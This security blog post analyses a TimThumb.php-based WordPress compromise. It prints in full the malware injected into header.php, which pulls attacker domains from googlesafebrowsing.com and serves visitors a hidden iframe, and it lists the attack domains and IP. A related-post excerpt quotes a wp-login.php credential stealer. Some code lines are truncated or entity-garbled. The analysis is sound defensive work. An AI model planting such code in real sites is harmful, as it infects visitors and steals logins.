TimThumb.php attacks – Now using googlesafebrowsing dot com

We have been talking a lot lately about the Timthumb.php vulnerability and the importance of updating the script as soon as possible. Sites that didn’t update it are getting compromised very easily. We explained it in more detail here: Mass infection of WordPress sites because of TimThumb.php.

What we are seeing now is a small modification to the attack method. Instead of modifying the .htaccess or infecting the jquery.js or l10n.js scripts within WordPress core, they are modifying the header.php of the compromised WordPress site with this code:

<!– Wordpress Counter –>
<?php
if ( !is_user_logged_in() && !isset ( $_COOKIE[‘MTPT’] ) ) {

if ( get_option ( ‘domain_update’ ) === FALSE && ( $newdomain = ..
add_option ( ‘domain’, $newdomain, ”, ‘no’ );
add_option ( ‘domain_update’, time (), ”, ‘no’ );
}
if ( time () – get_option ( ‘domain_update’ ) > 10*60 && ( $newdomain =..
update_option ( ‘domain’, $newdomain );
update_option ( ‘domain_update’, time () );
}

$domain = get_option ( ‘domain’ );
if ($domain)
echo 
‘<script language="javascript">
var ExpDate = new Date ();
ExpDate&#46setTime(ExpDate&#46getTime() + (7 * 24 * 60 * 60));
SetCookie("MTPT","1",ExpDate, "/");

function SetCookie (name, value) {
 var argv = SetCookie&#46arguments;
 var argc = SetCookie&#46arguments&#46length;
 var expires = (argc > 2) ? argv[2] : null;
 var path = (argc > 3) ? argv[3] : null;
 var domain = (argc > 4) ? argv[4] : null;
 var secure = (argc > 5) ? argv[5] : false;
 document&#46cookie = name + "=" + escape (value) +
 ((expires == null) ? "" : ("; expires=" + expires&#46toGMTString())) +
 ((path == null) ? "" : ("; path=" + path)) +
 ((domain == null) ? "" : ("; domain=" + domain)) +
 ((secure == true) ? "; secure" : "");
}
</script>
<iframe src="http://’ &#46 $domain . ‘/kwizhveo&#46php" width="1" height="1" 
</iframe>’;
}

function get_new_domain () {
$url = ‘http://googlesafebrowsing&#46com/remoted&#46cc&#46txt’;
if ( function_exists ( ‘curl_init’ ) ) {
$ch = @curl_init ( $url );
@curl_setopt ( $ch, CURLOPT_RETURNTRANSFER, TRUE );
$doms = @curl_exec ( $ch );
@curl_close ( $ch );

else 
$doms = @file_get_contents ( $url );

if ( strpos ( $doms, ‘||’ ) === false )
   return false;

$domains = explode ( ‘||’, trim ( $doms ) );
return $domains[array_rand ( $domains )];
}
?>

<!– Wordpress Counter –>

What this code does it very simple. It connects to http://googlesafebrowsing.com/remoted.cc.txt and extracts a domain to be used to hide a malicious iframe in attempt to infect everyone visiting the site:

blaackhatt58.us.to/kwizhveo.php
heidiheernande.us.to/kwizhveo.php
gufmaurr79.us.to/kwizhveo.php
(and many others)

All the domains are hosted at 85.17.19.165 and in the .us.to top level domain. If your site is compromised, you can scan it here: http://sitecheck.sucuri.net.

If you need help cleaning up up, sign up here: http://sucuri.net/signup

6 comments
  1. Where can I find this code/hack? I have been having this issue since day one (counter-wordpress.com) but haven’t been able to find anything.. Even your scanner shows my site all green/safe

Comments are closed.

You May Also Like

Simple WP login stealer

We recently found the following malicious code injected into wp-login.php on multiple compromised websites. \ } // End of login_header() $username_password=$_POST[‘log’].”—-xxxxx—-“.$_POST[‘pwd’].”ip:”.$_SERVER[‘REMOTE_ADDR’].$time = time().”\r\n”; $hellowp=fopen(‘./wp-content/uploads/2018/07/[redacted].jpg’,’a+’); $write=fwrite($hellowp,$username_password,$time);…
Read the Post